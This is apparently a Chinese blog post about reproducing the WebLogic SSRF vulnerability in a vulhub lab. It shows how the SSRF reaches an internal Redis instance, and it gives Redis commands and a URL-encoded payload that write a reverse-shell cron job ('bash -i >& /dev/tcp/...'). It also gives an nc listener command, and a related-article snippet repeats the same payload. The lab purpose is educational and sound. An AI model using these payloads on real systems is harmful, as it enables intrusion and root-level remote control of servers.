【weblogic ssrf漏洞复现】

最新推荐文章于 2024-07-19 16:27:02 发布
最新推荐文章于 2024-07-19 16:27:02 发布
阅读量259 收藏
点赞数
文章标签: 安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71635484/article/details/129662323
版权

一、搭建靶场

进入vulhub靶场,进入ssrf目录,启用7001端口查看并进行ssrf漏洞实验。

二、复现步骤

  1. 发现源代码存在链接,用burpsuite抓取包,查看operator,发现正是链接。

2、修改operator的url连接,ip:7001。发现返回404,说明内网连接成功。

3、测试输入错误端口号,是否有返回结果。

4、进入redis,查看redis的ip :docker exec -it 12a /bin/bash

5、在operator中的url中将ip改为redis的ip端口号为6379,发现返回一个“Received a response”。

6、在/etc目录下写一个shell.php脚本文件,输入以下内容。

test
 
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.1.130/2023 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
 
aaa

7、在operator中的端口后面插入url编码后的码。

test%0A%20%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%2    0-i%20%3E&%20/dev/tcp/192.168.1.130/2023%200%3E&1%5Cn%5Cn%5Cn%5Cn%22%0Aconf    ig%20set%20dir%20/etc/%0Aconfig%20set%20dbfilename%20crontab%0Asave%0A%20%0    Aaaa

8、用Ubuntu监听即可

nc -lvp 2023

为什么不展开说说呢,因为我监听不了...

fly哥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 590
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
Weblogic SSRF(CVE-2014-4210)漏洞复现
m0_64583632的博客
02-06 503
Weblogic SSRF(CVE-2014-4210)漏洞复现
利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
wenqingshuo321的博客
10-11 765
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
redis写定时任务获取root权限
repoman的博客
12-09 758
前提: 1.redis由root用户启动。 2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。 启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列) sudo /etc/init.d/cron start (ubuntu系列) 一.windows下 config set dir /var/spool/cron config set db..
Weblogic SSRF漏洞复现
huangyongkang666的博客
07-22 1213
Weblogic SSRF漏洞复现
WebLogic SSRF漏洞复现
qq_36567469的博客
04-18 2820
weblogic ssrf漏洞复现
Weblogic ssrf漏洞复现
wutiangui的博客
11-06 324
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
漏洞复现Weblogic SSRF漏洞复现
Miraitowax
02-22 924
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
【vulhub】weblogic ssrf漏洞复现
weixin_53730939的博客
03-19 618
【vulhub】weblogic ssrf漏洞复现(详解)
Weblogic SSRF 漏洞复现
qq_45953122的博客
09-12 423
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic相关漏洞
05-03
WebLogic 相关漏洞概述 WebLogic 是 Oracle 公司出品的一款 Java EE 应用服务器,广泛应用于企业级应用系统中。然而,WebLogic 也存在一些漏洞,可能会被攻击者利用,导致严重的安全问题。以下是 WebLogic 相关漏洞...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 535
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 276
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 434
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 761
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值